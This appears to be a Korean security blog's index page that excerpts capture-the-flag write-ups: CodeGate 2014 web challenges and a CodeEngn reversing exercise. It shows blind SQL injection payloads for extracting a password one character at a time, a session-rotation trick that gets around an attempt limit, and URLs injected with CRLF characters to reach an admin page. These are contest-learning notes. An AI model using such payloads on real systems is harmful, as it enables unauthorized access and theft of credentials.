[CodeGate 2014] web 500 hint 120 Count -> 새로운 암호생성 세션 변경시 -> 새로운 암호생성 1'or 1='1 1'or 1='2 세션 gvqmir6dlg2rl9se35j6n73uh1 부터 gvqmir6dlg2rl9se35j6n73uh5 까지 생성 후 돌려가며 쿼리를 날리면 120번이라는 카운트는 무의미하게 된다. select * from rms_120_pw where (ip='x.x.x.x') and (password='1 or substr(password,1,1)='g') False select * from rms_120_pw where (ip='x.x.x.x') and (password='1 or substr(password,1,1)='h') True 더보기 [CodeGate 2014] web 200 ex) http://naver.comfilter: php, // ... Hint http://58.229.183.24/188f6594f694a3ca082f7530b5efc58dedf81b8d/index.php?url=localhost/188f6594f694a3ca082f7530b5efc58dedf81b8d/admin/ http://58.229.183.24/188f6594f694a3ca082f7530b5efc58dedf81b8d/index.php?url=localhost/188f6594f694a3ca082f7530b5efc58dedf81b8d/admin/ HTTP/1.0%0aRange: bytes=372-%0a%0a http://58.229.183.24/188f6594f694a3ca082f7530b5efc.. 더보기 CodeEngn Basic 11 Find the answer C# / Basic .NET .NET Reflector Tool 사용하여 디코딩 Find IF!!! Puse상태에서 1234 입력 후 이동 Hareware BreakPoint kernel32.dll 영역으로 보아 Consol Module 함수인듯Step Over로 출력 부분 찾기로 결심 EDX와 ECX 비교문 ECX = 1234 EDX = 답 Success 더보기 이전 1 2 3 4 5 ··· 9 다음
